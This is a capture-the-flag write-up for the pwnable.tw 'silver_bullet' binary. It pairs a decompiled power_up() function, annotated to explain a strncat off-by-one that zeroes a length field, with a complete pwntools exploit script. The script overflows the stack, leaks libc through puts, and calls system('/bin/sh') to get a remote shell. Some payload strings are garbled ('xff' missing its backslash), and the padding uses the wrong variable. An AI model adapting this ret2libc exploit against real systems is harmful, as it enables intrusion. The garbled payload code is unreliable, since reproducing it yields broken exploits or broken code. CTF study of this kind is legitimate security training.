
    产生漏洞的原因

    /*
     * Decompiler output for the challenge binary's power_up(), reproduced as-is
     * (the vulnerable function under analysis, not code to be built).
     *
     * dest layout as used here: a 48-byte (0x30) description buffer followed, at
     * dest + 48, by a 4-byte length field (*((_DWORD *)dest + 12)).
     *
     * Defect: the bound passed to strncat() is 48 - len, i.e. the whole remaining
     * buffer, but strncat() also writes a '\0' after the copied bytes. When the
     * appended data fills the buffer exactly, that terminator lands on dest[48],
     * the low byte of the length field; the field is at most 47 here, so it
     * becomes 0 and the length computed below under-reports the real size. The
     * next call then trusts the bad length and copies past the end of dest.
     * Fix (reviewer suggestion): bound the copy by 47 - len so the terminator stays
     * inside the buffer, and compute new_len from the length read *before* strncat().
     */
    int __cdecl power_up(char *dest)
    {
      char s; // [esp+0h] [ebp-34h]  -- 0x30-byte staging buffer on this frame
      size_t new_len; // [esp+30h] [ebp-4h]
    
      new_len = 0;
      memset(&s, 0, 0x30u);
      if ( !*dest )
        return puts("You need create the bullet first !");
      if ( *((_DWORD *)dest + 12) > 47u )           // rejects only len >= 48; len == 47 still passes
        return puts("You can't power up any more !");
      printf("Give me your another description of bullet :");
      read_input(&s, 48 - *((_DWORD *)dest + 12)); // presumably reads up to 48 - len bytes into s -- verify read_input
      strncat(dest, &s, 48 - *((_DWORD *)dest + 12));// appends up to 48 - len bytes AND a terminating '\0';
                                                    // the length field sits at dest + 0x30, so when the copy
                                                    // fills the buffer the '\0' zeroes the length field
      new_len = strlen(&s) + *((_DWORD *)dest + 12);// with the field zeroed, new_len is just the appended length
      // NOTE(review): the line break inside the format string is an extraction
      // artifact of the original "\n" escape; the binary prints a single line.
      printf("Your new power is : %u
    ", new_len);
      *((_DWORD *)dest + 12) = new_len;             // stores the under-reported length for the next call
      return puts("Enjoy it !");
    }

    脚本

    # pwntools script accompanying the power_up() analysis above (Python 2 era:
    # bytes/str are not distinguished and generators expose .next()).
    from pwn import *

    context.log_level='DEBUG'


    r=remote('chall.pwnable.tw',10103)
    file=ELF('./silver_bullet')
    libc=ELF('./libc_32.so.6')
    '''
    r=process('./silver_bullet')
    file=ELF('./silver_bullet')
    libc=ELF('/lib/i386-linux-gnu/libc-2.28.so')
    '''

    #trigger stack overflow
    # Phase 1: reach the off-by-one in power_up(). A 47-byte description leaves
    # one byte free; the 1-byte power-up fills the buffer exactly, so strncat()'s
    # terminator zeroes the length field and the stored length becomes 1.
    r.recvuntil('Your choice :')
    r.sendline('1')
    r.recvuntil('Give me your description of bullet :')
    r.send('a'*47)
    r.sendline('2')
    r.recvuntil('Give me your another description of bullet :')
    r.send('b')
    #gdb.attach(r)

    #leak libc
    # Phase 2: with the length under-reported, the next power-up is allowed to
    # write past the buffer. The data overwrites what follows it on the stack;
    # the layout used here (3 filler bytes, a saved-ebp placeholder, then a
    # return address) is inferred from the binary and not shown on this page.
    r.recvuntil('Your choice :')
    r.sendline('2')
    r.recvuntil('Give me your another description of bullet :')
    start=0x080484F0   # presumably the binary's entry point, used to restart after the leak -- verify
    # NOTE(review): 'xff' is almost certainly '\xff' with the backslash lost in
    # extraction; as written it is three 3-byte strings and the offsets shift.
    payload='xff'*3+p32(0xdeadbeaf)+p32(file.plt['puts'])+p32(start)+p32(file.got['puts'])
    payload+=(47-len(payload))*'a'
    r.send(payload)
    r.recvuntil('Your choice :')
    r.sendline('3')
    r.recvuntil('Oh ! You win !! ')
    libc_base=u32(r.recv(4))-libc.sym['puts']   # puts@got value minus its libc offset gives the base
    success('libc_base:'+hex(libc_base))
    sys_addr=libc_base+libc.sym['system']
    binsh_addr=libc_base+libc.search('/bin/sh').next()   # .next() is Python 2 only; Python 3 is next(...)
    success('binsh_addr'+hex(binsh_addr))
    #gdb.attach(r)

    #trigger stack overflow again
    # Phase 3: the program was restarted, so the length-field corruption must be
    # re-created exactly as in phase 1.
    r.recvuntil('Your choice :')
    r.sendline('1')
    r.recvuntil('Give me your description of bullet :')
    r.send('a'*47)
    r.sendline('2')
    r.recvuntil('Give me your another description of bullet :')
    r.send('b')

    #trigger system('/bin/sh') call
    # Phase 4: same overwrite as phase 2 with the resolved libc addresses.
    r.recvuntil('Your choice :')
    r.sendline('2')
    r.recvuntil('Give me your another description of bullet :')
    payload1='xff'*3+p32(0xdeadbeaf)+p32(sys_addr)+p32(0xdeadbeaf)+p32(binsh_addr)
    # NOTE(review): pads with len(payload), not len(payload1); it only works
    # because both payloads happen to be the same length.
    payload1+=(47-len(payload))*'a'
    r.send(payload1)
    r.recvuntil('Your choice :')
    r.sendline('3')
    r.recvuntil('Oh ! You win !! ')
    r.interactive()


